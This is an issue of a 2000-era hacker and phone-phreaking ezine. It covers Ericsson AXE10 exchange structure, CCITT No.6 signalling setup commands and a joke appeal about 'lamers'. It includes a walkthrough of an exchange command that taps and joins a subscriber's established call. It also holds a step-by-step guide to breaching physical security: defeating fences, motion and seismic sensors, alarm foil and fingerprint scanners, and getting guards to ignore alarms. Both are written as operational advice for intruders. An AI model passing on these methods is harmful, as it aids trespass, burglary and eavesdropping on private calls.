Copy Link
Add to Bookmark
Report
f41th Issue 13
yyyyyssssyyyy yyyyssssyyyy yyyy yyyy
|lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy
:|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$
:||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$
:::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS
::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l
.:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::|
=========================================================
f41th magazine issue 13. June 2000.. http://www.f41th.com
=========================================================
-------------hybrid datawar psyclone grip----------------
=========================================================
D4RKCYDE, soo katokhos
Werd... welcome to f41th 13 bitches. ekho kanee 31337 teelefoneemata,
phovos.. thoste moo k0dez malaka.. poo eena o kondeenoteros teelefoneekos
thalamos? peeos eene o areethmos ya Malasia.. yetee yellas re malaka? toso
askheema eene ta eleeneeka moo? wx, skasa re tora lamer, global phovos....
..cl1ck.
werd to datawar, zomba and all the ppl in #darkcyde (excluding the lamers)
werd to blazinweed, type-0, micha, jasun, shadowx, siezer, oeb, substance,
potgirl, kp, nynexphre, shylock, werd..
-------------------------------------------------------------------------------
Local AXE10 Exchange Subsystems................ by hybrid
Bypassing Physical Securtity................... by tophat
CCITT Signalling System No.6................... by potgirl
BT Operator 999 Emergency Call Routing......... D4RKCYDE
Cellular Tracking Part II...................... by tradeser
UK Hand Scan of 0800 056 0xxx/1xxx............. by slinkie
UK Hand Scan of 0808 100 2xxx.................. by slinkie
Plague v0.1.................................... by datawar
| by blazinweed
|-README
|-ghost.c
|-server.c
|-server.list
------------------------------------------------------------------------------
1ST AN APPEAL FROM THE BRITISH COUNCIL OF P3GL3GS...
Hello.. Every year around the world, thousands of lamers are born.. The
British Council of Peglegs (B-COP) would like to make this special appeal
to the more fortunate lamers out there... Lameness is a big problem that
exists all over the world, these poor children have no direction in life..
most of them will end up trying to seek help by calling Childline by
boxing off their neibours lines.. How can we help these rejects? ...The
answer is simple, all we are asking for is a minute of your time for our
"help the lamers to help themselves" campaign... We are offering lamers
mental guidance and counciling by our team of trained proffesionals at the
B-COP Sunny Home in Alabamba.. But of course, proffesional lamer guidance
comes at a cost, even in the worst cases... We are asking four YOUR help..
You can SAVE somebody today! ...This is how YOU can HELP:
Every year we hand around the "Love for Lamers Pot"... you can help by
donating your used kodez in this pot (shown in figure 1).
Figure 1. |||||
......... Kodez. -----
: ([ o O ])
== : == \ - / <--- Lamer.
| | __| |__ (Bob, from
|______| <--- Love for Lamers Pot. | | Canada)
What help will Bob recieve from your kind donations? --The answer is
simple.. Bob will recieve love and guidance through his hard times as a
lamer... Our basic package for Bob will include the following
scientificaly proven lamer help methods at his new home:
* proffesional medical treatment from one of our highly trained
qualified vets.
* a brand-new speech synthesiser.
* daily electric shock therapy.
* a free shell at hobbiton.org
* a free "./" cap (one size fits all)
* a 21 day crash course in network security, (hosted by one of our
sponsors from O'reilly Books)
* daily injections of window cleaner.
...ACT NOW! and recieve a free car bumper sticker "hand made by one of
our rehabilitaed lamers" Help the Lamers to help THEMSELVES.
--------------------------------------------------------------------------
Local AXE10 Exchange Subsystems
hybrid <hybrid@f41th.com>
--------------------------------------------------------------------------
The AXE10 exchange is sometimes referred to as "System Y", and is
manufactured by Ericsson. It is modular in design and is therefore divided
into a number of subsystems. The following text describes the subsystems
in a local exchange and shows how they are interconnected.
Basic Structure
===============
An AXE10 exchange can be split into three main parts. These are known as
APT, APZ, and IOG. As shown in the following diagram:
+-------------------------------------------------------+
: .----------. .----------. .----------. :
: | APT | | SWITCH | | JUNCTION | :
.---.---:--|-> <-|-----|-> <-|-----|-> ACCESS-|-------:------->
|:::| : |__________| |__________| |__________| :
PHONE : | | | :junctions
: | APT: | | :
: | customer | __________| :
: | access | | :
: | | | :
: | | | :
:.......|................|.....|........................:
: | | | : IOG :
: .----|----------------|-----|----. : .-----. :MM COMS
: | | : | I/O |-------:------->
: | APZ: CONTROL <-|--:--|-> | :OMC
: |________________________________| : |_____|-------:------->
: : :ALARMS
:______________________________________:________________|
(Basic Structure of an AXE10 Exchange)
(IOG == Input Ouput Group)
Call switching, customer acces and junction access are all handled by the
APT, while control is the responsibility of the APZ. Input and output
connections to terminals, printers, alarms, storage devices, and data
links are all handled by the IOG. This is similar to a theoretical layout
of a System X exchange type.
Subsystems
==========
The three main parts are divided into a number of subsystems, as shown in
the following diagram:
+-------------------------------------------------------+
: .----------. .----------. .----------. :
: | APT | | GSS | | TSS | :
.---.---:--|-> SSS <-|-----|-> <-|-----|-> -|-------:------->
|:::| : |__________| |__________| |__________| :
PHONE : | | | :junctions
: | | | _______ :
: | | __________| | CCS | :
: | | | |_______| :
: | | | ________________| :
: | | | | :
:.......|................|.....|.|......................:
: | | | | ___ : :
: | | | | | | : :
: | | | | | | : :
: .----|----------------|-----|-|-|-. | : .-.--------. :
: | RPS | | : | | MCS |-:------->
: |_________________________________| | : | |--------| :alarms
: |_:_|_| FMS | :printers
: : |S| IOG | :terminals
: .---------------------------------. : |P|--------| :
: | APZ CPS | : |S| DCS |-:------->
: |_________________________________| : |_|________| :OMC
: : :access
:________________________________________:______________:
(AXE10 Subsystems)
(APZ control is split into Regional Processing Subsystem (RPS),
and the Central Processing Subsystem (CPS)).
APT contains the:
(APT Subsystems)
Subscriber Switching Subsystem (SSS) to provide customer access
===============================================================
The SSS has the same function as the DSSS in System X and concentrates
customers lines into a number of digital (PCM) links. It can be sited in
an AXE10 exchange where it is called a Local Subscriber Switch (LSS) or in
a remote location where it is called a Remote Subscriber Switch (RSS). As
with System X remote concentrators (RCUs), the collection of RSSs on one
site is called a Remote Concentrator Centre (RCC).
Trunk and Signalling Subsystem (TSS) which deals with junction access
=====================================================================
TSS handles the connections to other exchanges. Its main job is to match
the AXE10 exchange to various junction signalling systems. It is similar
in function to the SIS subsystem in System X.
Group Switching Subsystem (GSS) which handles switching
=======================================================
GSS is the heart of the switching system and is responsible for connecting
and supervising speech paths, it is similar to the DSS in a System X
exchange.
Common Channel Subsystem (CCS) which handles CCITT No 7 (C7) signalling
=======================================================================
This subsystem handles the common channel signalling messages between the
AXE10 and other exchanges. It is similar in function to the MTS in System
X exchanges.
APZ Subsystems
==============
Regional Processor Subsystem (RPS)
==================================
RPS consists of a number of Regional Processors (RPs). These processors
perform simple, routine, high capacity tasks, such as scanning of
subscribers lines and the operation of switches. The regional processors
are usually mounted next to the equipment they are serving and so are
spread around the exhange equipment.
Central Processor Subsystem (CPS)
=================================
CPS contains two processors (CPs) which carry out all the complex
processing needed to control the AXE10 exchange. The duplication of
central processors is necessary for system security. It is similar in
function to the PUS subsystem in System X.
IOG Subsystems
==============
Support processor Subsystem (SPS)
=================================
This subsystem supervises the operation of all IOF functions.
Man-machine Communication Subsystems (MCS)
==========================================
This subsystem handles communications between input/output devices and the
rest if the AXE10 exchange. These devices can be visial display terminals,
printers, or alarm panels.
Data Communications Subsystem (DCS)
===================================
This subsystem handles communications over digital links e.g. (in the UK:
OMC etc). MCS and DCS have approximately the same function as the AUS and
NIS subsystems in System X.
File Managment Subsystem (FMS)
==============================
All mass storage devices (backing stores) are connected via the FMS
subsystem. These devices can take the form of tapes, floppy disks and hard
disks. In System X this function is part of the PUS subsystem.
What an AXE10 Exchange l00ks like
=================================
Inside a typical AXE10 exchange will be rows of cabinets containing 1
or 2 AXE10 Central Processor Racks (containing mounted magazines, cards
and cables). 1 or 2 IOG11 cabinets (narrow looking cabinets with just 1
door).
Deployment
==========
Most of Greece, especially populated areas such as Athens is served by
AXE10 and System Y subsystems. In the UK there are ISCs (International
Switching Centres) which handle traffic to and from other countries, such
as: Keybridge, Kelvin, Madley which are using AXE10 for international
trunking and supervision.
Managment
=========
AXE10 MCS Man Machine Interfaces control the functionality of the AXE10
system. To list every "function" that is available in the Ericsson AXE10
command line would take forever, just for a tase of what these commands
look like, here is an example of a MONITORING command line descrition.
MONITORING, INITIATE
====================
+ + + +
+ + | DEV=dev | BCH=bch | | // command format.
MONTI:|BNB=bnb,| + +' + +;
+ + | SNB=snb |
+ +
// parameters
BCH=bch B-channel identity. Numeral with value 1-30. Used to
initiate monitoring on a specific B-channel at
applications where one device corresponds to one access.
BNB=bnb B-number for listening or speech connection to test
position. Digit string 1-16 digits where each digit is
0-9 or #10-#15.
DEV=dev Device designation. Expressed as dety-n where dety: a
device type identfier 1-7 characters (system defined) n:
Numeral 0-65535. The maximum value is defined by SAE=500
in the block which ownz the device. Alternate expressions
can be found in the appliocation information for block
TRAN and the concerned device block.
SNB=snb Subscriber number. Digit string 1-12 digits where each
digit is 0-9 or #10-#15. The maximum number of digits can
be found in the application information for block TRAN.
Dialogue Parameters
===================
CON; Executes trunk offering of the monitored object. This
cannot be given if offering with speech facility has
already been executed.
END; Disconnects the monitoring function and terminates the
dialogue command.
NXT; Initiates monitoring of the next channel of the monitored
object. This can only be used if there is more than one
channel for the monitored object and where BCH has not
been specified. It may only be given after a monitoring
connection has been established.
SON; Executes trunk offering with speech facility of the
monitored object.
The function
============
In dialouge with the function, the command orders trunk offering in GS for
monitoring of an ESTABLISHED CALL. The command can only be ordered and
executed from a defined test position in the exchange. The function is
able to handle monitoring of successive channels of ISDN subscriber lines
with more than one channel. Trunk offering is not permitted for certain
subscriber catigories.
In applications where one device corresponds to one primary rate access,
it is possbile to innitiate monitoring of a specific B-channel by the
paremter BCH. If paremeter BCH is not specified then monitoring is
performed on the first busy channel.
If the operator wishes to enter the line with conversation about the
monitored call, this can be done with the paremter SON, in which case the
printout SPEECH MONITORING ESTABLISHED will be recieved.
Monitoring of subscriber number 9900220: (example)
(<)MONTI:SNB=9900220;
(READY FOR CONNECTION)
(:) CON;
(CONNECTION ESTABLISED)
(:) SON;
(SPEECH MONITORING ESTABLISHED)
(:) END;
(CONCLUSION OF COMMAND MONTI)
<click>
=============================================================
propz: Brain5torm, datawar, grip, zomba, psyclone, substance.
deDz: POTS, 9X, D4RKCYDE.
=============================================================
http://hybrid.dtmf.org
--------------------------------------------------------------------------
Bypassing physical securtity.
by Tophat
The High Class Hooligan
[ http://www.mobsters.net ]
--------------------------------------------------------------------------
In this day and age many people are well versed in network breaching. Many
times a computer and a telephone line is all it takes to "get in". But for
old times sake, this textfile will discuss many ways of avoiding, and even
bypassing, physical security systems.
Note: This t-file is composed greatly of information gathered from the
LOD/H Technical Journal "Identifying, Attacking, Defeating, and Bypassing
Physical Security and Intrusion Detection Systems" written by Lex Luthor.
This file will be an update to that file, parts of that file will be
incorporated into this file, and all things that have changed and/or
recently come about will be mentioned in the file as well.
Fences
------
*Barbed wire fences*
Barbed wire fences, short of plain chain link fences, are the most common
forms of physical security. One form of barbed wire has thee barbs places
approx. 6-8" apart, leaving plenty of room for hand or foot. This type of
wire usually consists of 2-3 strands of metal and can thus be cut quite
easily. The other common form of barbed wire is "razor ribbon". This is
wire strung out in a circlie over the top of a fence with razor sharp barbs
in it. Attempting to climb over this is difficult because the wire is in a
circle and cannot support any weight without collapsing upon itself and
cutting someone. It is also unwise to cut since it will unroll and spring
back once it is cut...not to mention being terribly obvious. However, I
have seen a person climb it without getting cut, but that takes time,
strength, and finesse..things which can not be taught in a t-file ;)
Many times a tough material such as leather or, as I have found to work
well, old carpet scraps, can be thrown over the razor ribbon making a
safe passage possible.
*Electric Fences*
Sound scary don't they? These are mainly used in very high security
facilities (such as prisons), and on cattle farms. Obviously the voltage is
quite different for either. Contrary to what movies would have you believe,
touching an electric will not fry you. The voltage is so varied that stating
an exact voltage would be nothing more than a gamble. The fence is part of
circuit that has enought current running through to make it very
uncomfortable. This is very similar to those Invisible dog fences The current
in the fence doesn't wound the dog, but it is certainly enough to deter the
dog from trying to pass it. One way to get past the fence is top quite simply
jump over it. If you touch the fence, but don't touch anythnig else (i.e.
ground, poles, etc..) you will not feel the shock. Your body is just becoming
part of the circuit. Using this method you could run and jump placing your
foot on the fence and pushing off with the same foot. Now of course, hardly
any of these fences will be short enough to jump over. Another way is to cut
the fence. There are tools out there designed specifically to cut electric
fences. These tools are made of synthetic metals that do not conduct
electricty. I have purchasesd a synthetic knife that when used properly
with its scrabbard it able to cut eletric fences with out discomfort. I
purchased this knife from 'Smoky Mountain Knife Works'
(www.smokymountainknife.com). You can also purchase synthetic bolt cutters
from a major hardware store. The downside of this method is that it leaves
visible evidence of intrusion.
Fence mounted sensors
---------------------
*shock sensors*
These mount on fence posts at intervals of 10 to 20 feet, or on every post.
They are small boxes clamped about 2/3 up from ground level. There is a
cable, either twisted pair or coax running horizontally across the fence
connecting these boxes. The cable can be concealed in conduits or inside
the fence itself, thus, making it hard to visually detect. Each fence sensor
consists of a seismic shock sensor that detects climbing over, lifting
up or cutting through the fence. There is also something called "E-Flex
cable". This cable can not only be used on chain linkfences, but can also be
used on concrete block, brick, or other solid barriers. It may be on the
outside, or mounted inside the fence, thus, making detection of the device
harder. Of course detection of this and other similar devices which cannot
be seen, doesn't make it impossible. There are also forms of this sensor
that are microphones. These just pick up noise transmitted along the fence
itself. These are pretty uncommom since noise along the fence is not an
uncommon occurance.
*vibration sensors*
These are pretty much the same thing, only constrcuted different. Although
this sounds extremely ghetto, a good way to test for hidden sensors is to
play around with the fence. Throw rocks, sticks, whatever at it. Then hide
and watch. Not only do you get to see what kind of security system they have,
but you also get a chance to see how long it takes them to respond.
Security lighting and Video Cameras
-----------------------------------
*CCTV*
Sometimes, fences may be backed up by Closed Circuit Television (CCTV)
systems to make visual monitoring of the perimeter easier and quicker. By
installing an adequate lighting system and conventional CCTV cameras, or
by using special low light sensitive cameras (infared and night vision),
the perimeter can be monitored from a central point. Security personnel
can then be dispatched when an intruder is seen on the monitors.
Cameras can either stationary or movable. Starionary cameras are in a fixed
position monitoring one spot. These cameras are set higher up to give a
greater viewing field. Movable cameras can be either remotely controlled by
a keypad or joystick, or are programmed to move after a given time delay.
Since these cameras are usually set upon a wall they can not rotate the full
360 degrees. To get a larger turning radius movable cameras are usually
bolted to a corner of a wall, thus giving more room to turn. A Moveable
camera post on top of a pole can ger clost to a 360 degree radius. The best
way to avoid cameras is to find out if a camera is movable or not, and how
long the time intervals between each movement is if the camera is moveable.
The plan your path accordingly: walk against walls, fences, directly under
cameras, etc..
*Light control sensor*
This utilizes a Passive InfraRed (PIR) sensor to detect the body heat
emitted from someone entering the detection area, and can activate a light
or other alarm. The sensor has an option called: 'night only mode' in which
a light will flash when a person enters the area, but only during night
hours. It can tell if its dark by either a photoelectric sensor, or by a
clock. Of course if its daylight savings time, the clock may not be totally
accurate, which can be used to your advantage. If it is photoelectric, you
can simply place a flashlight pointing directly into the sensor during
daylight hours. When it gets dark, the photoelectric sensor will still
'think' its day since there is sufficient light, thus, not activating the
unit to detect alarm conditions. These sensors are incased insmall metal
boxes, about 6x4 inches, the sensor itself is behind a dark colored glass
plate, about an inch or two square. These sensors can also be taped over to
trick the alarm/light into staying active. This can be useful if you need
to create a diversion of some sort.
Buried Seismic Sensors
----------------------
Seismic detectors are designed to identify an intruder by picking up the
sound of your footsteps or other noises related to passing through the
protected area. These sensors have a range of about 20 feet and are buried
underground and linked by a cable, which carries the signals to a processor.
There, the signals are amplified and equalized to eliminate frequencies
that are unrelated to intruder motion (like a human compared to animal).
The signals are converted to pulses that are compared with a standard signal
threshold. Each pulse that crosses this threshold is tested on count and
frequency. If it meets all the criteria for a footstep, an alarm is
triggered. These sensors can even be installed under asphalt or concrete by
cutting a trench through the hard surface. It is also immune to weather and
can follow any type of terrain. The only restriction is that the area of
detection must be free of any type of obstruction such as a tree or a bush.
A clever way to confuse the system is to use abnormal methods of entry.
Bicycles, rollerblades, etc., will not register the same as footsteps would.
Electronic field sensor
-----------------------
These detect an intruder by measuring a change in an electric field. The
field sensors use a set of two cables, one with holes cut into the cable
shielding to allow the electromagnetic field to 'leak' into the surrounding
area. The other cable is a receiver to detect the field and any changes in
it. Objects passing through the field distort it, triggering an alarm. This
sensor can either be buried or free standing, and can follow any type of
terrain. But its very sensitive to animals, birds, or wind blown debris,
thus, if it is very windy out, and you know this is being used, you can get
some paper and throw it so the wind takes it and sets off the alarm
repeatedly. If it is done enough, they may temporarily turn it off, or ignore
it due to excessive false alarms.
It is not hard to tell if these devices are in use. You cannot see them, but
you don't have to. Simply get 3-4 medium sized stones. Throw them into the
place where you think the protected area is. Repeat this several times. This
works on the lesser advanced systems that have trouble distinguishing this
type of seismic activity from human walking/running. If nothing happens, you
can be reasonably sure this is not in use. Now that you can detect it, how do
you defeat it? Well as far as the electronic field sensor is concerned, you
should wait for a windy night and cause excessive false alarms and hope
they will turn it off. As far as the seismic sensors, you can take it one
step at a time, very softly, maybe one step every 30-60 seconds. These
sensors have a threshold, say, two or more consecutive footsteps in a 30
second time interval will trigger the alarm. Simply take in one step at a
time, slowly, and wait, then take another step, wait, until you reach your
destination. These detectors work on the assumption that the intruder has
no knowledge of the device, and will walk/run across the protected area
normally, thus, causing considerable seismic vibrations. The problem with
this method is that it will take you some time to pass through the protected
area. This means there is more of a chance that you will be seen. If there
are a lot of people going in and out of the facility, you may not want to
use this method. Another way would be to run across the protected area,
right next to the door, (assuming that is where the response team will come
out) and drop a large cat or a dog there. When they come out, they will
hopefully blame the alarm on the animal. The sensor shouldn't really pick
up a smaller animal, but odds are the security force are contract guards
who wouldn't know the capabilities of the device and the blame would fall
on the animal and not you.
Microwave systems
-----------------
In an outdoor microwave system, a beam of microwave energy is sent from a
transmitter to a receiver in a conical pattern. Unlike indoor microwave
detectors, which detect an intruders' movement in the microwave field, the
outdoor system reacts to an intruders' presence by detecting the decrease
in energy in the beam. The beams can protect an area up to 1500 feet long
and 40 feet wide. All transmission is line-of-sight and the area between
transmitter and receiver should be kept clear of trees and other objects
that can block the beam. Microwave systems can operate in bad weather,
and won't signal an alarm due to birds or flying debris.
These systems work on the Doppler effect, in which they detect motion that
changes the energy, and sets off an alarm. These devices will usually be
placed inside a fence to avoid false alarms. These devices are very easy to
visually detect. They are posts from 1-2 yards high, about 6 inches by
6 inches and there are 2 of them, one receiver and one transmitter. In some
cases there will be more, which enables them to protect a larger area.
To defeat this, you can enter the field, very slowly, taking one step at a
time but each step should be like you are in slow motion. It doesn't matter
how hard you hit the ground, since it doesn't detect seismic activity, only
how fast you approach the field. If you take it very slowly you may be able
to get past. Detectors of this type get more and more sensitive as you
approach the posts. Ergo, choose a path which will lead you furthest away
from the posts. These systems are very rare, and have since started to
become outdated.
Photoelectric systems
---------------------
These systems rely on an invisible barrier created by beams of infrared
light sent from a light source to a receiver. When the beam is interrupted,
the alarm sounds. The beam can have a effective range of up to 500 feet.
Multiple beams can be used to increase the effectiveness of the system,
making it harder for you to climb over or crawl under the beams.
Photoelectric systems can be prone to false alarms as a result of birds or
wind-blown debris passing through the beam. The problem can be corrected by
the installation of a circuit that requires the beam to be broken for a
specified amount of time before an alarm is sounded. Weather conditions
like heavy fog, can also interrupt the beam and cause an alarm. This can
also be corrected by a circuit that reacts to gradual signal loss. These
systems will not face directly into the rising or setting sun since this
also cuts off the signal beam.
As you can see this system has many problems which you can take advantage of
to bypass this system. As with any system and method, surveillance of the
facility should be accomplished in various weather conditions to help verify
the existence of a particular detection device, and to see how they react to
false alarms. Many times, you will be able to take advantage of various
conditions to accomplish your mission. If there is only one set of devices
(transmitter and receiver), try to estimate the distance of the sensors from
the ground. You can then either crawl under or jump over the beam. This
also works on the assumption that the intruder will not recognize that the
device is in use.
Temperature Monitoring systems
------------------------------
One popular type of alarm is a device that monitors temperature in a area.
Since it measures temperature it does not have a given radius of effect.
Thus they can monitor large areas with just a single unit. These systems can
be either programmed with the room temperature, such as in a computer lab
where the temperature is always a certain degree, or they have be set to
adjust to the room temperature. These work by sensing a distrubance in the
temperature and then alerting an alram. These can detect a heat increase of
a human walking as well as a decrease (or increase maybe) in temperature
caused by a door being opend or window being broken. These changes in
temperature occur very swiftly. In order to fool the system it would be
possible to change the tempetature very slowly do the desired temperature.
One way to do this would be instead of breaking the window, to drill a hole
in it and very slowly leak outside air in. If done slow enough, you can get
the room temperature to equal outside temperature without sounding the alarm.
This method will not work if the temperature is programmed to a certain
degree.
Foil tape:
----------
This is by far the most common, and probably the most improperly installed
form of glass breakage detection, which also makes it the most insecure.
This is usually a silver foil tape about 5/16" wide which should be placed
on the whole perimeter of a glass window or door. In the case of
plexyglass or a similar material, the tape should be placed in rows
separated by 6-12 inches.
The older foil was covered with a coating of eurathane or epoxy which enabled
it to stick onto the glass. The newer foil has an adhesive back making
installation much easier. There should be two connectors which are located at
the upper top part of a window, and the lower part of the window which connects
the foil to the processor, thus, completing the circuit. Foil may or may not
have a supervised loop. If it is supervised, and you use a key to scratch the
foil (when it is turned off) making a complete break in it, an alarm will sound
when it is turned on.
Foil is commonly used as a visual deterrent. Many times, it will not even be
activated. The easiest way to determine if the facility is trying to 'B.S.' you
into thinking they have a security system, is to see if there are any breaks
in the foil. If there is a clean break, the 6-12V DC current which is normally
making a loop isn't. Thus, breaking the glass will do nothing other than make
some noise unless you take steps against that happening.
As was stated, foil is the most improperly installed type of glass breakage
detection. When it is installed improperly, it will not cover all the area it
should. Often the installer neglects to place the foil all the way down to
the bottom of the glass door. There is enough room for a person to climb
through. They may have thought that if someone broke the glass, it would all
break, which is normally correct. But if you obtain some strong contact paper,
preferably clear, adhere it to the glass =, and break the bottom part at
the it will break up to the edge. Thus, leaving the foil in-tact. This will
work on tempered glass the best, and will not work on Lexan or Plexyglass.
There is a transparent window film with a break strength of up to 100 pounds
per square inch which can be obtained from Madico, Inc. It is called, Protekt
LCL-400 XSR, and makes glass harder to break and stays essentially in
place even when broken. This can be used in place of the contact
paper. Obviously, it is also used to protect glass from breakage.
Types of Security Windows
---------------------------
Plate glass: Can be cut with a glass cutter.
Tempered: Normally can't be cut. Breaks up into little pieces when broken.
Safety: You need a hatchet to break this stuff.
Wire: This has wire criss-crossed inside of the glass, making it very hard to
break, and even harder to actually go through the opening it is in place of.
Plexy: Very hard to break, doesn't really shatter, but can be melted with the
use of a torch.
Lexan: This is used in bulletproof glass. One of the strongest and most secure
types of glass.
Herculite: Similar to Lexan.
Glass Bricks: The thick blocks of glass you seen in lots of 50s type
resturants. These are very hard to break, but they are held together by a
strong poxy which can be dissolved. They then can be pushed out of place.
Fingerprint Scanners
---------------------
These are often located on the interior of buildings but are sometimes used
at entryways as well. Fingerprint systems scan in the print of person and
then run it against a database of fingerprints that belong to allowed
personnel. The most common method to bypass this is to use the fingerprint of
the previous person who entered. The scanner is made out of a darkglass that
oils and dirt from a finger easily stick to. If you can completely cover up
your finger, and make it smooth (with say, a rubber glove), you can press
firmly on the glass which will then scan the remains of the previous
fingerprint. The scanners cannot always recieve a difinite fingerprint and
thus scan for the major identifications (crest, pattern, etc..). Because of
this, what remains from the previous fingerprint is usually enough
information to allow passage.
Retina Scanners
-----------------
This is bascially the same concept as above. The scanner checks the scan it
recieves against a database of previously scanned personnel. I have never
tried, or heard of way to defeat this system without disabling it. But in
theory, if a person were to obtain a retina scan from the allowed database,
s/he could then have eye contacts made with that pattern. The contacts would
have to have a black finish on the inside of the contact thus to give it a
uniform background. The scanner would then read the pattern of the contact
and grant access. If anyone has the facilites to test this out, please, let
me know.
I'm srating to see what a large file this is turning out to be. There is
still tons of information left (keypad locks, card slots, wireless
transmitters, etc..), so much that I will have to make at least a part II
to this file. I will wait and see what kind of response this file gets.
--------------------------------------------------------------------------
CCITT SIGNALLING SYSTEM NO. 6
by potgirl <brain5torm@pots.gr>
--------------------------------------------------------------------------
Signalling System CCITT NO.6 is a system for common channel signalling
over international circuits. This means that the signalling takes place
over a signalling link that is seperate from the speech circuits. Thus a
great number of speech circuits can be controlled by only one signalling
link. This system can be used over all types of international circuits,
including TASI and satellite circuits.
The main features of CCITT NO.6. are as follows.
===========================================================================
- The system is intended for use on bothway trunk
circuits with a possibility of both analogue and
PCM transmission.
===========================================================================
- The call control information includes parameters
for terminal / transit indication, satellite circuits,
echo suppressor function , and information on the
category of the calling party.
===========================================================================
- Capacity for up to 2048 speech circuits, controlled by
one signalling link.
===========================================================================
- Continuity check of speech path using a continuity tone.
===========================================================================
- Operator facility using Forward Transfer signal.
===========================================================================
- Potential for automatic repeat attempt.
===========================================================================
- Transmission fault supervision on a per circuit basis.
===========================================================================
- Network maintenance signalling.
===========================================================================
CONCERNED HARDWARE
------------------
This Test Instruction can be used when testing the following HW:
ETC1 BFD 113 021/4 (32 Channels)
ETC 24 BFD 114 513/2
TC6D BFD 115 532/2
PCD BFD 123 503/3
C6ST BFD 114 512/2
MODEM BDF 115 025/2 (ZAT 2400-6)
===========================================================================
- The BT's (PCD) for the speech and signalling links are
strapped according to the exchange Transmission Level
Diagram.
===========================================================================
- The RP's and EM's for the BT's, ST's and TC's are tested
and working (EXEMP:RP=rp,EM=em;).
===========================================================================
- The external echo suppressors are ready to be used
(strapped etc) and are functioning. Their connection and
operation should have been checked in a separate test.
===========================================================================
- The Modems and the PCD's connected to them are strapped
for correct levels and function of System 6. (*)
(See Permanent Exchange Adaption 1/15518-CNT 2181611
for details)
===========================================================================
- The PCD's connected to the Transceivers are strapped
for correct level and tested. (*)
===========================================================================
(*) NOTE:
If looped in own exchange, the transmission level
diagram has to be revised (no transmission equipment
between transmit and received side).
===========================================================================
Size Alteration Events
Global Events
SAE=102,(No. of Link Sets.)
SAE=103,(No. of Sig. Route Sets.)
SAE=104,(No. of Sig. Term. Pts.Sig. Route Set.)
Local Events
SAE=500,BLOCK=BTN6D32,BTN6D24,BTM6D32,BTM6D24,TC,C6ST (No. of Tel. Devices.)
SAE=504,BLOCK=BTM6D32,BTM6D24 (Routes per device block)
SAE=519,BLOCK=C6DR (No. of BTMEM.)
SAE=520,BLOCK=C6DR (No. of Bandmem.)
SAE=527,BLOCK=BTN6D32,BTN6D24 (Signal Buffer.)
===========================================================================
Check that the allocation of the ETC , C6ST and Transceiver
individuals in the GSD has been made in the exchange data
already loaded.
<EXDEP:DEV=dev...;
Check that Route Data has been made and correct FNC's allocated
===========================================================================
ie. FNC=5 (Sig.Route)
FNC=3 (Speech Route)
FNC=1 (Sig.Terminal)
===========================================================================
Data for ETC signalling routes.
Define the signalling route for the ETC-32 Transfer Links.
<EXROI:R=C6S32O&C6S32I,DETY=BTN6D32,FNC=5;
Define the signalling route for the ETC-24 Transfer Links.
<EXROI:R=C6S24O&C6S24I,DETY=BTN6D24,FNC=5;
Connect the ETC-32 BT devices to be used for signalling.
Physically loop BTN6D32-00&&-31 to BTN6D32-32&&-63.
Physically loop BTN6D32-64&&-95 to BTN6D32-96&&-127.
Use channel 1 as the signalling channel.
<EXDRI:R=C6S32O&C6S32I,DEV=BTN6D32-1&-33&-65&-97
Connect the ETC-24 BT devices to be used for signalling.
Physically loop BTN6D24-00&&-23 to BTN6D24-24&&-47.
Physically loop BTN6D24-48&&-71 to BTN6D24-72&&-95.
Use channel 0 in each as the signalling link.
<EXDRI:R=C6S24O&C6S24I,DEV=BTN6D24-0&-24&-48&-72;
===========================================================================
Data for C6ST signalling routes.
Define the route for the C6ST's.
<EXROI:R=C6ST,DETY=C6ST,FNC=1;
Connect the ST devices
<EXDRI:R=C6ST,DEV=C6ST-0&&-7;
Check that C6ST's are connected to GSS
<EXDEP:R=C6ST;
If not, connect the ST devices
<EXDUI:DEV=C6ST-0&&-x,DEVP=SNTPCD32-y-z;
===========================================================================
Data for C6 Link Sets.
Define Link Sets for ETC-32.
<C6LSI:LS=L032,CYT=LONG,CER,NLSH;
<C6LSI:LS=L132,CYT=SHORT,NCER,NLSH;
Define Link Sets for ETC-24.
<C6LSI:LS=L024,CYT=LONG,CER,NLSH;
<C6LSI:LS=L124,CYT=SHORT,NCER,NLSH;
Connect the Signalling Links to BTN6D32 channels for signalling.
The next available C6ST will be used, and a semipermanent connection
is set up between it and the BTN6D32 device, and they will both go SEBU.
<C6SLI:LS=L032,SL=1,SLT=PST,ALTR,DEV=BTN6D32-1 ! 1st Sig. Link;
<C6SLI:LS=L032,SL=2,SLT=PST,ALTR,DEV=BTN6D32-33 ! 2nd Sig. Link;
<C6SLI:LS=L132,SL=1,SLT=PST,ALTR,DEV=BTN6D32-65 ! 1st Sig. Link;
<C6SLI:LS=L132,SL=2,SLT=PST,ALTR,DEV=BTN6D32-97 ! 2nd Sig. Link;
Connect the Signalling Links to BTN6D24 channels for signalling.
The next available C6ST will be used, and a semipermanent connection
is set up between it and the BTN6D24 device, and they will both go SEBU.
<C6SLI:LS=L024,SL=1,SLT=PST,ALTR,DEV=BTN6D24-00 ! 1st Sig. Link ;
<C6SLI:LS=L024,SL=2,SLT=PST,ALTR,DEV=BTN6D24-48 ! 2nd Sig. Link ;
<C6SLI:LS=L124,SL=1,SLT=PST,ALTR,DEV=BTN6D24-24 ! 1st Sig Link ;
<C6SLI:LS=L124,SL=2,SLT=PST,ALTR,DEV=BTN6D24-72; ! 2nd Sig Link ;
===========================================================================
Reset Data
Define the Reset Function.
<C6RFI:SRS=1,RSF=RSB;
<C6RFI:SRS=2,RSF=RSB;
<C6RFI:SRS=3,RSF=RSB;
<C6RFI:SRS=4,RSF=RSB;
Signalling Route Set Data
Connect Linksets to Routeset for ETC-32.
<C6SRI:SRS=1,LS=L032,ALTR,INFO=ASS; (SRS-1 to LS=L032)
<C6SRI:SRS=2,LS=L132,ALTR,INFO=ASS; (SRS-2 to LS=L132)
Connect Linksets to Routeset for ETC-24.
<C6SRI:SRS=3,LS=L024,ALTR,INFO=ASS; (SRS-3 to LS=L024)
<C6SRI:SRS=4,LS=L124,ALTR,INFO=ASS; (SRS-4 to LS=L124)
